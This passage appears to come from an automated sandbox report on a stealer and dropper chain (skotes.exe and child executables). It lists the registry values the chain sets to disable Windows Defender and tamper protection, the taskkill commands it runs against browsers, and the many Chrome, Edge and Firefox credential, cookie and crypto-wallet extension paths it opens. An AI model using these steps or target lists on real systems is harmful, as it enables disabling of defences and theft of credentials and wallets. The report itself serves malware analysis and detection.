                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006DB226 SendInput,keybd_event,11_2_006DB226
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006F22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,11_2_006F22DA
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe "C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe "C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe "C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe "C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ae5cfd188c.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ae5cfd188c.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006D0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,11_2_006D0B62
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006D1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_006D1663
                          Source: 2ada66c192.exe, 0000000B.00000000.2593438166.0000000000732000.00000002.00000001.01000000.0000000B.sdmp, 2ada66c192.exe, 0000001E.00000002.2915748492.0000000000732000.00000002.00000001.01000000.0000000B.sdmp, 2ada66c192.exe, 0000002C.00000000.2906143455.0000000000732000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                          Source: 37df924488.exe, 37df924488.exe, 00000009.00000002.2576273292.0000000000A5B000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: dProgram Manager
                          Source: 9c2827fca4.exe, 0000001C.00000002.2847103308.0000000000858000.00000040.00000001.01000000.00000012.sdmpBinary or memory string: nProgram Manager
                          Source: 2ada66c192.exeBinary or memory string: Shell_TrayWnd
                          Source: firefox.exe, 00000018.00000002.2789947329.000000D7FE7FB000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ?Progman
                          Source: file.exe, 00000000.00000002.1709781128.0000000000C17000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1747717299.0000000000CD7000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1755986614.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: ^lProgram Manager
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00ABDD91 cpuid 6_2_00ABDD91
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009FCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_009FCBEA
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006CD27A GetUserNameW,11_2_006CD27A
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006ABB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,11_2_006ABB6F
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_006742DE
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Lowering of HIPS / PFW / Operating System Security Settings

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
                          Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableIOAVProtection 1
                          Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableRealtimeMonitoring 1
                          Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\NotificationsRegistry value created: DisableNotifications 1
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeRegistry value created: TamperProtection 0
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
                          Source: ae5cfd188c.exe, 0000000A.00000003.2787137785.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000002.2812159132.0000000000C35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: 6.2.skotes.exe.aa0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.skotes.exe.aa0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.9e0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.skotes.exe.aa0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000002.00000002.1754799297.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.1709477652.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.1746831215.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 2ada66c192.exe PID: 1364, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: ae5cfd188c.exe PID: 7872, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: ae5cfd188c.exe PID: 3512, type: MEMORYSTR
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 00000009.00000002.2578174288.000000000143E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001B.00000002.2760593914.0000000000681000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001B.00000002.2764793088.000000000142B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000003.2534662557.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001B.00000003.2673057530.0000000005030000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000002.2575911980.0000000000681000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 37df924488.exe PID: 7148, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 37df924488.exe PID: 6796, type: MEMORYSTR
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: ae5cfd188c.exe, 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets=
                          Source: ae5cfd188c.exe, 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s/ElectronCash
                          Source: ae5cfd188c.exe, 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Libertyfilplm
                          Source: ae5cfd188c.exe, 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: r-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Bina
                          Source: ae5cfd188c.exe, 0000000A.00000003.2630336262.0000000000CC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wu
                          Source: ae5cfd188c.exe, 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                          Source: ae5cfd188c.exe, 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 0,"p":"%appdata%\\Ethereum","m":g
                          Source: ae5cfd188c.exe, 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                          Source: ae5cfd188c.exe, 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                          Source: ae5cfd188c.exe, 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
